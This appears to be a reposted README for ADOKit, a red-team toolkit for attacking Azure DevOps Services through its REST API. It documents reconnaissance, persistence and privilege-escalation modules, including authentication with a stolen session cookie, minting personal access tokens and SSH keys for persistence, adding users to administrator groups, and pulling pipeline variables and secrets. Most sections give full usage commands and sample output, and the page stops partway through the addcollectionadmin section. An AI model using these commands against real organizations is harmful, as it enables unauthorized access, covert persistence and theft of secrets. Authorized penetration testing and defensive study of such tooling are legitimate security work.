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ADOKit - Azure DevOps Services Attack Toolkit

By: Zion3R

Azure DevOps Services Attack Toolkit - ADOKit is a toolkit that can be used to attack Azure DevOps Services by taking advantage of the available REST API. The tool allows the user to specify an attack module, along with specifying valid credentials (API key or stolen authentication cookie) for the respective Azure DevOps Services instance. The attack modules supported include reconnaissance, privilege escalation and persistence. ADOKit was built in a modular approach, so that new modules can be added in the future by the information security community.

Full details on the techniques used by ADOKit are in the X-Force Red whitepaper.


Libraries Used

The below 3rd party libraries are used in this project.

Library URL License
Fody MIT License
Newtonsoft.Json MIT License


  • Use the pre-compiled binary in Releases

Building Yourself

Take the below steps to setup Visual Studio in order to compile the project yourself. This requires two .NET libraries that can be installed from the NuGet package manager.

  • Load the Visual Studio project up and go to "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
  • Go to "NuGet Package Manager" --> "Package Sources"
  • Add a package source with the URL
  • Install the Costura.Fody NuGet package.
  • Install-Package Costura.Fody -Version 3.3.3
  • Install the Newtonsoft.Json package
  • Install-Package Newtonsoft.Json
  • You can now build the project yourself!

Command Modules

  • Recon
  • check - Check whether organization uses Azure DevOps and if credentials are valid
  • whoami - List the current user and its group memberships
  • listrepo - List all repositories
  • searchrepo - Search for given repository
  • listproject - List all projects
  • searchproject - Search for given project
  • searchcode - Search for code containing a search term
  • searchfile - Search for file based on a search term
  • listuser - List users
  • searchuser - Search for a given user
  • listgroup - List groups
  • searchgroup - Search for a given group
  • getgroupmembers - List all group members for a given group
  • getpermissions - Get the permissions for who has access to a given project
  • Persistence
  • createpat - Create personal access token for user
  • listpat - List personal access tokens for user
  • removepat - Remove personal access token for user
  • createsshkey - Create public SSH key for user
  • listsshkey - List public SSH keys for user
  • removesshkey - Remove public SSH key for user
  • Privilege Escalation
  • addprojectadmin - Add a user to the "Project Administrators" for a given project
  • removeprojectadmin - Remove a user from the "Project Administrators" group for a given project
  • addbuildadmin - Add a user to the "Build Administrators" group for a given project
  • removebuildadmin - Remove a user from the "Build Administrators" group for a given project
  • addcollectionadmin - Add a user to the "Project Collection Administrators" group
  • removecollectionadmin - Remove a user from the "Project Collection Administrators" group
  • addcollectionbuildadmin - Add a user to the "Project Collection Build Administrators" group
  • removecollectionbuildadmin - Remove a user from the "Project Collection Build Administrators" group
  • addcollectionbuildsvc - Add a user to the "Project Collection Build Service Accounts" group
  • removecollectionbuildsvc - Remove a user from the "Project Collection Build Service Accounts" group
  • addcollectionsvc - Add a user to the "Project Collection Service Accounts" group
  • removecollectionsvc - Remove a user from the "Project Collection Service Accounts" group
  • getpipelinevars - Retrieve any pipeline variables used for a given project.
  • getpipelinesecrets - Retrieve the names of any pipeline secrets used for a given project.
  • getserviceconnections - Retrieve the service connections used for a given project.


  • /credential: - credential for authentication (PAT or Cookie). Applicable to all modules.
  • /url: - Azure DevOps URL. Applicable to all modules.
  • /search: - Keyword to search for. Not applicable to all modules.
  • /project: - Project to perform an action for. Not applicable to all modules.
  • /user: - Perform an action against a specific user. Not applicable to all modules.
  • /id: - Used with persistence modules to perform an action against a specific token ID. Not applicable to all modules.
  • /group: - Perform an action against a specific group. Not applicable to all modules.

Authentication Options

Below are the authentication options you have with ADOKit when authenticating to an Azure DevOps instance.

  • Stolen Cookie - This will be the UserAuthentication cookie on a user's machine for the domain.
  • /credential:UserAuthentication=ABC123
  • Personal Access Token (PAT) - This will be an access token/API key that will be a single string.
  • /credential:apiToken

Module Details Table

The below table shows the permissions required for each module.

Attack Scenario Module Special Permissions? Notes
Recon check No
Recon whoami No
Recon listrepo No
Recon searchrepo No
Recon listproject No
Recon searchproject No
Recon searchcode No
Recon searchfile No
Recon listuser No
Recon searchuser No
Recon listgroup No
Recon searchgroup No
Recon getgroupmembers No
Recon getpermissions No
Persistence createpat No
Persistence listpat No
Persistence removepat No
Persistence createsshkey No
Persistence listsshkey No
Persistence removesshkey No
Privilege Escalation addprojectadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removeprojectadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation addbuildadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removebuildadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation addcollectionadmin Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removecollectionadmin Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation addcollectionbuildadmin Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removecollectionbuildadmin Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation addcollectionbuildsvc Yes - Project Collection Administrator, Project Colection Build Administrators or Project Collection Service Accounts
Privilege Escalation removecollectionbuildsvc Yes - Project Collection Administrator, Project Colection Build Administrators or Project Collection Service Accounts
Privilege Escalation addcollectionsvc Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removecollectionsvc Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation getpipelinevars Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
Privilege Escalation getpipelinesecrets Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
Privilege Escalation getserviceconnections Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts


Validate Azure DevOps Access

Use Case

Perform authentication check to ensure that organization is using Azure DevOps and that provided credentials are valid.


Provide the check module, along with any relevant authentication information and URL. This will output whether the organization provided is using Azure DevOps, and if so, will attempt to validate the credentials provided.

ADOKit.exe check /credential:apiKey /url:

ADOKit.exe check /credential:"UserAuthentication=ABC123" /url:

Example Output

C:\>ADOKit.exe check /credential:apiKey /url:

Module: check
Auth Type: API Key
Search Term:
Target URL:

Timestamp: 3/28/2023 3:33:01 PM

[*] INFO: Checking if organization provided uses Azure DevOps

[+] SUCCESS: Organization provided exists in Azure DevOps

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

3/28/23 19:33:02 Finished execution of check


Use Case

Get the current user and the user's group memberhips


Provide the whoami module, along with any relevant authentication information and URL. This will output the current user and all of its group memberhips.

ADOKit.exe whoami /credential:apiKey /url:

ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:

Example Output

C:\>ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:

Module: whoami
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/4/2023 11:33:12 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Username | Display Name | UPN
jsmith | John Smith | jsmith@YourOrganization.onmicrosoft. com

[*] INFO: Listing group memberships for the current user

Group UPN | Display Name | Description
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
[TestProject2]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.

4/4/23 15:33:19 Finished execution of whoami

List Repos

Use Case

Discover repositories being used in Azure DevOps instance


Provide the listrepo module, along with any relevant authentication information and URL. This will output the repository name and URL.

ADOKit.exe listrepo /credential:apiKey /url:

ADOKit.exe listrepo /credential:"UserAuthentication=ABC123" /url:

Example Output

C:\>ADOKit.exe listrepo /credential:UserAuthentication=ABC123 /url:

Module: listrepo
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 3/29/2023 8:41:50 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Name | URL
TestProject2 |
MaraudersMap |
SomeOtherRepo | tWithMultipleRepos/_git/SomeOtherRepo
AnotherRepo |
ProjectWithMultipleRepos |
TestProject |

3/29/23 12:41:53 Finished execution of listrepo

Search Repos

Use Case

Search for repositories by repository name in Azure DevOps instance


Provide the searchrepo module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching repository name and URL.

ADOKit.exe searchrepo /credential:apiKey /url: /search:cred

ADOKit.exe searchrepo /credential:"UserAuthentication=ABC123" /url: /search:cred

Example Output

C:\>ADOKit.exe searchrepo /credential:apiKey /url: /search:"test"

Module: searchrepo
Auth Type: API Key
Search Term: test
Target URL:

Timestamp: 3/29/2023 9:26:57 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Name | URL
TestProject2 |
TestProject |

3/29/23 13:26:59 Finished execution of searchrepo

List Projects

Use Case

Discover projects being used in Azure DevOps instance


Provide the listproject module, along with any relevant authentication information and URL. This will output the project name, visibility (public or private) and URL.

ADOKit.exe listproject /credential:apiKey /url:

ADOKit.exe listproject /credential:"UserAuthentication=ABC123" /url:

Example Output

C:\>ADOKit.exe listproject /credential:apiKey /url:

Module: listproject
Auth Type: API Key
Search Term:
Target URL:

Timestamp: 4/4/2023 7:44:59 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Name | Visibility | URL
TestProject2 | private |
MaraudersMap | private |
ProjectWithMultipleRepos | private | http s://
TestProject | private |

4/4/23 11:45:04 Finished execution of listproject

Search Projects

Use Case

Search for projects by project name in Azure DevOps instance


Provide the searchproject module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching project name, visibility (public or private) and URL.

ADOKit.exe searchproject /credential:apiKey /url: /search:cred

ADOKit.exe searchproject /credential:"UserAuthentication=ABC123" /url: /search:cred

Example Output

C:\>ADOKit.exe searchproject /credential:apiKey /url: /search:"map"

Module: searchproject
Auth Type: API Key
Search Term: map
Target URL:

Timestamp: 4/4/2023 7:45:30 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Name | Visibility | URL
MaraudersMap | private |

4/4/23 11:45:31 Finished execution of searchproject

Search Code

Use Case

Search for code containing a given keyword in Azure DevOps instance


Provide the searchcode module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching code file, along with the line in the code that matched.

ADOKit.exe searchcode /credential:apiKey /url: /search:password

ADOKit.exe searchcode /credential:"UserAuthentication=ABC123" /url: /search:password

Example Output

C:\>ADOKit.exe searchcode /credential:UserAuthentication=ABC123 /url: /search:"password"

Module: searchcode
Auth Type: Cookie
Search Term: password
Target URL:

Timestamp: 3/29/2023 3:22:21 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[>] URL:
|_ Console.WriteLine("PassWord");
|_ this is some text that has a password in it

[>] URL:
|_ Console.WriteLine("PaSsWoRd");

[*] Match count : 3

3/29/23 19:22:22 Finished execution of searchco de

Search Files

Use Case

Search for files in repositories containing a given keyword in the file name in Azure DevOps


Provide the searchfile module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching file in its respective repository.

ADOKit.exe searchfile /credential:apiKey /url: /search:azure-pipeline

ADOKit.exe searchfile /credential:"UserAuthentication=ABC123" /url: /search:azure-pipeline

Example Output

C:\>ADOKit.exe searchfile /credential:UserAuthentication=ABC123 /url: /search:"test"

Module: searchfile
Auth Type: Cookie
Search Term: test
Target URL:

Timestamp: 3/29/2023 11:28:34 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

File URL
---------------------------------------------------------------------------------------------------- s

3/29/23 15:28:37 Finished execution of searchfile

Create PAT

Use Case

Create a personal access token (PAT) for a user that can be used for persistence to an Azure DevOps instance.


Provide the createpat module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, date valid til, and token content for the PAT created. The name of the PAT created will be ADOKit- followed by a random string of 8 characters. The date the PAT is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.

ADOKit.exe createpat /credential:"UserAuthentication=ABC123" /url:

Example Output

C:\>ADOKit.exe createpat /credential:UserAuthentication=ABC123 /url:

Module: createpat
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 3/31/2023 2:33:09 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

PAT ID | Name | Scope | Valid Until | Token Value
8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit- rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM | tokenValueWouldBeHere

3/31/23 18:33:10 Finished execution of createpat

List PATs

Use Case

List all personal access tokens (PAT's) for a given user in an Azure DevOps instance.


Provide the listpat module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, and date valid til for all active PAT's for the user.

ADOKit.exe listpat /credential:apiKey /url:

ADOKit.exe listpat /credential:"UserAuthentication=ABC123" /url:

Example Output

C:\>ADOKit.exe listpat /credential:UserAuthentication=ABC123 /url:

Module: listpat
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 3/31/2023 2:33:17 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

PAT ID | Name | Scope | Valid Until
9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM
8776252f-9e03-48ea-a85c-f880cc8308 98 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM

3/31/23 18:33:18 Finished execution of listpat

Remove PAT

Use Case

Remove a PAT for a given user in an Azure DevOps instance.


Provide the removepat module, along with any relevant authentication information and URL. Additionally, provide the ID for the PAT in the /id: argument. This will output whether the PAT was removed or not, and then will list the current active PAT's for the user after performing the removal.

ADOKit.exe removepat /credential:apiKey /url: /id:000-000-0000...

ADOKit.exe removepat /credential:"UserAuthentication=ABC123" /url: /id:000-000-0000...

Example Output

C:\>ADOKit.exe removepat /credential:UserAuthentication=ABC123 /url: /id:0b20ac58-fc65-4b66-91fe-4ff909df7298

Module: removepat
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/3/2023 11:04:59 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[+] SUCCESS: PAT with ID 0b20ac58-fc65-4b66-91fe-4ff909df7298 was removed successfully.

PAT ID | Name | Scope | Valid Until
9b354668-4424-4505-a35f-d098903 4da18 | test-token | app_token | 4/29/2023 1:20:45 PM

4/3/23 15:05:00 Finished execution of removepat

Create SSH Key

Use Case

Create an SSH key for a user that can be used for persistence to an Azure DevOps instance.


Provide the createsshkey module, along with any relevant authentication information and URL. Additionally, provide your public SSH key in the /sshkey: argument. This will output the SSH key ID, name, scope, date valid til, and last 20 characters of the public SSH key for the SSH key created. The name of the SSH key created will be ADOKit- followed by a random string of 8 characters. The date the SSH key is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.

ADOKit.exe createsshkey /credential:"UserAuthentication=ABC123" /url: /sshkey:"ssh-rsa ABC123"

Example Output

C:\>ADOKit.exe createsshkey /credential:UserAuthentication=ABC123 /url: /sshkey:"ssh-rsa ABC123"

Module: createsshkey
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/3/2023 2:51:22 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

SSH Key ID | Name | Scope | Valid Until | Public SSH Key
fbde9f3e-bbe3-4442-befb-c2ddeab75c58 | ADOKit-iCBfYfFR | app_token | 4/3/2024 12:00:00 AM | ...hOLNYMk5LkbLRMG36RE=

4/3/23 18:51:24 Finished execution of createsshkey

List SSH Keys

Use Case

List all public SSH keys for a given user in an Azure DevOps instance.


Provide the listsshkey module, along with any relevant authentication information and URL. This will output the SSH Key ID, name, scope, and date valid til for all active SSH key's for the user. Additionally, it will print the last 20 characters of the public SSH key.

ADOKit.exe listsshkey /credential:apiKey /url:

ADOKit.exe listsshkey /credential:"UserAuthentication=ABC123" /url:

Example Output

C:\>ADOKit.exe listsshkey /credential:UserAuthentication=ABC123 /url:

Module: listsshkey
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/3/2023 11:37:10 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

SSH Key ID | Name | Scope | Valid Until | Public SSH Key
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=

4/3/23 15:37:11 Finished execution of listsshkey

Remove SSH Key

Use Case

Remove an SSH key for a given user in an Azure DevOps instance.


Provide the removesshkey module, along with any relevant authentication information and URL. Additionally, provide the ID for the SSH key in the /id: argument. This will output whether SSH key was removed or not, and then will list the current active SSH key's for the user after performing the removal.

ADOKit.exe removesshkey /credential:apiKey /url: /id:000-000-0000...

ADOKit.exe removesshkey /credential:"UserAuthentication=ABC123" /url: /id:000-000-0000...

Example Output

C:\>ADOKit.exe removesshkey /credential:UserAuthentication=ABC123 /url: /id:a199c036-d7ed-4848-aae8-2397470aff97

Module: removesshkey
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/3/2023 1:50:08 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[+] SUCCESS: SSH key with ID a199c036-d7ed-4848-aae8-2397470aff97 was removed successfully.

SSH Key ID | Name | Scope | Valid Until | Public SSH Key
---------------------------------------------------------------------------------------------------------------------------------------------- -------------------------
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=

4/3/23 17:50:09 Finished execution of removesshkey

List Users

Use Case

List users within an Azure DevOps instance


Provide the listuser module, along with any relevant authentication information and URL. This will output the username, display name and user principal name.

ADOKit.exe listuser /credential:apiKey /url:

ADOKit.exe listuser /credential:"UserAuthentication=ABC123" /url:

Example Output

C:\>ADOKit.exe listuser /credential:apiKey /url:

Module: listuser
Auth Type: API Key
Search Term:
Target URL:

Timestamp: 4/3/2023 4:12:07 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Username | Display Name | UPN
user1 | User 1 |
jsmith | John Smith |
rsmith | Ron Smith |
user2 | User 2 |

4/3/23 20:12:08 Finished execution of listuser

Search User

Use Case

Search for given user(s) in Azure DevOps instance


Provide the searchuser module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching username, display name and user principal name.

ADOKit.exe searchuser /credential:apiKey /url: /search:user

ADOKit.exe searchuser /credential:"UserAuthentication=ABC123" /url: /search:user

Example Output

C:\>ADOKit.exe searchuser /credential:apiKey /url: /search:"user"

Module: searchuser
Auth Type: API Key
Search Term:
Target URL:

Timestamp: 4/3/2023 4:12:23 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Username | Display Name | UPN
user1 | User 1 | user1@YourOrganization.onmic
user2 | User 2 |

4/3/23 20:12:24 Finished execution of searchuser

List Groups

Use Case

List groups within an Azure DevOps instance


Provide the listgroup module, along with any relevant authentication information and URL. This will output the user principal name, display name and description of group.

ADOKit.exe listgroup /credential:apiKey /url:

ADOKit.exe listgroup /credential:"UserAuthentication=ABC123" /url:

Example Output

C:\>ADOKit.exe listgroup /credential:apiKey /url:

Module: listgroup
Auth Type: API Key
Search Term:
Target URL:

Timestamp: 4/3/2023 4:48:45 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

UPN | Display Name | Description
[TestProject]\Contributors | Contributors | Members of this group can add, modify, and delete items w ithin the team project.
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project-Scoped Users | Project-Scoped Users | Members of this group will have limited visibility to organization-level data
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by t he test controllers set up for this project collection.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[TEAM FOUNDATION]\Enterprise Service Accounts | Enterprise Service Accounts | Members of this group have service-level permissions in this enterprise. For service accounts only.
[YourOrganization]\Security Service Group | Security Service Group | Identities which are granted explicit permission to a resource will be automatically added to this group if they were not previously a member of any other group.
[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management


4/3/23 20:48:46 Finished execution of listgroup

Search Groups

Use Case

Search for given group(s) in Azure DevOps instance


Provide the searchgroup module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group.

ADOKit.exe searchgroup /credential:apiKey /url: /search:"someGroup"

ADOKit.exe searchgroup /credential:"UserAuthentication=ABC123" /url: /search:"someGroup"

Example Output

C:\>ADOKit.exe searchgroup /credential:apiKey /url: /search:"admin"

Module: searchgroup
Auth Type: API Key
Search Term:
Target URL:

Timestamp: 4/3/2023 4:48:41 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

UPN | Display Name | Description
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, mod ify and delete build definitions and manage queued and completed builds.
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
[TestProject]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[TestProject2]\Project Administrators | Project Administrators | Members of th is group can perform all operations in the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
[ProjectWithMultipleRepos]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project Collection Build Administrators | Project Collection Build Administrators | Members of this group should include accounts for people who should be able to administer the build resources.
[TestProject]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.

4/3/23 20:48:42 Finished execution of searchgroup

Get Group Members

Use Case

List all group members for a given group


Provide the getgroupmembers module and the group(s) you would like to search for in the /group: command-line argument, along with any relevant authentication information and URL. This will output the user principal name of the group matching, along with each group member of that group including the user's mail address and display name.

ADOKit.exe getgroupmembers /credential:apiKey /url: /group:"someGroup"

ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url: /group:"someGroup"

Example Output

C:\>ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url: /group:"admin"

Module: getgroupmembers
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/4/2023 9:11:03 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Group | Mail Address | Display Name
[TestProject2]\Build Administrators | | User 1
[TestProject2]\Build Administrators | | User 2
[MaraudersMap]\Project Administrators | | Brett Hawkins
[MaraudersMap]\Project Administrators | | Ron Smith
[TestProject2]\Project Administrators | | User 1
[TestProject2]\Project Administrators | | User 2
[YourOrganization]\Project Collection Administrators | | John Smith
[ProjectWithMultipleRepos]\Project Administrators | | Brett Hawkins
[MaraudersMap]\Build Administrators | | Brett Hawkins

4/4/23 13:11:09 Finished execution of getgroupmembers

Get Project Permissions

Use Case

Get a listing of who has permissions to a given project.


Provide the getpermissions module and the project you would like to search for in the /project: command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group. Additionally, this will output the group members for each of those groups.

ADOKit.exe getpermissions /credential:apiKey /url: /project:"someproject"

ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url: /project:"someproject"

Example Output

C:\>ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url: /project:"maraudersmap"

Module: getpermissions
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/4/2023 9:11:16 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

UPN | Display Name | Description
[MaraudersMap]\Build Administrators | Build Administrators | Mem bers of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Project Valid Users | Project Valid Users | Members of this group have access to the team project.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.

[*] INFO: List ing group members for each group that has permissions to this project

GROUP NAME: [MaraudersMap]\Build Administrators

Group | Mail Address | Display Name

GROUP NAME: [MaraudersMap]\Contributors

Group | Mail Address | Display Name
[MaraudersMap]\Contributo rs | | User 1
[MaraudersMap]\Contributors | | User 2

GROUP NAME: [MaraudersMap]\MaraudersMap Team

Group | Mail Address | Display Name
[MaraudersMap]\MaraudersMap Team | | Brett Hawkins

GROUP NAME: [MaraudersMap]\Project Administrators

Group | Mail Address | Display Name
[MaraudersMap]\Project Administrators | | Brett Hawkins

GROUP NAME: [MaraudersMap]\Project Valid Users

Group | Mail Address | Display Name

GROUP NAME: [MaraudersMap]\Readers

Group | Mail Address | Display Name
[MaraudersMap]\Readers | | John Smith

4/4/23 13:11:18 Finished execution of getpermissions

Add Project Admin

Use Case

Add a user to the Project Administrators group for a given project.


Provide the addprojectadmin module along with a /project: and /user: for a given user to be added to the Project Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addprojectadmin /credential:apiKey /url: /project:"someProject" /user:"someUser"

ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url: /project:"someProject" /user:"someUser"

Example Output

C:\>ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url: /project:"maraudersmap" /user:"user1"

Module: addprojectadmin
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/4/2023 2:52:45 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to add user1 to the Project Administrators group for the maraudersmap project.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
-------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | | Brett Hawkins
[MaraudersMap]\Project Administrators | | User 1

4/4/23 18:52:47 Finished execution of addprojectadmin

Remove Project Admin

Use Case

Remove a user from the Project Administrators group for a given project.


Provide the removeprojectadmin module along with a /project: and /user: for a given user to be removed from the Project Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removeprojectadmin /credential:apiKey /url: /project:"someProject" /user:"someUser"

ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url: /project:"someProject" /user:"someUser"

Example Output

C:\>ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url: /project:"maraudersmap" /user:"user1"

Module: removeprojectadmin
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/4/2023 3:19:43 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to remove user1 from the Project Administrators group for the maraudersmap project.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | | Brett Hawkins

4/4/23 19:19:44 Finished execution of removeprojectadmin

Add Build Admin

Use Case

Add a user to the Build Administrators group for a given project.


Provide the addbuildadmin module along with a /project: and /user: for a given user to be added to the Build Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addbuildadmin /credential:apiKey /url: /project:"someProject" /user:"someUser"

ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url: /project:"someProject" /user:"someUser"

Example Output

C:\>ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url: /project:"maraudersmap" /user:"user1"

Module: addbuildadmin
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/4/2023 3:41:51 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to add user1 to the Build Administrators group for the maraudersmap project.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
-------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------
[MaraudersMap]\Build Administrators | | User 1

4/4/23 19:41:55 Finished execution of addbuildadmin

Remove Build Admin

Use Case

Remove a user from the Build Administrators group for a given project.


Provide the removebuildadmin module along with a /project: and /user: for a given user to be removed from the Build Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removebuildadmin /credential:apiKey /url: /project:"someProject" /user:"someUser"

ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url: /project:"someProject" /user:"someUser"

Example Output

C:\>ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url: /project:"maraudersmap" /user:"user1"

Module: removebuildadmin
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/4/2023 3:42:10 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to remove user1 from the Build Administrators group for the maraudersmap project.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------

4/4/23 19:42:11 Finished execution of removebuildadmin

Add Collection Admin

Use Case

Add a user to the Project Collection Administrators group.


Provide the addcollectionadmin module along with a /user: for a given user to be added to the Project Collection Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addcollectionadmin /credential:apiKey /url: /user:"someUser"

ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url: /user:"someUser"

Example Output

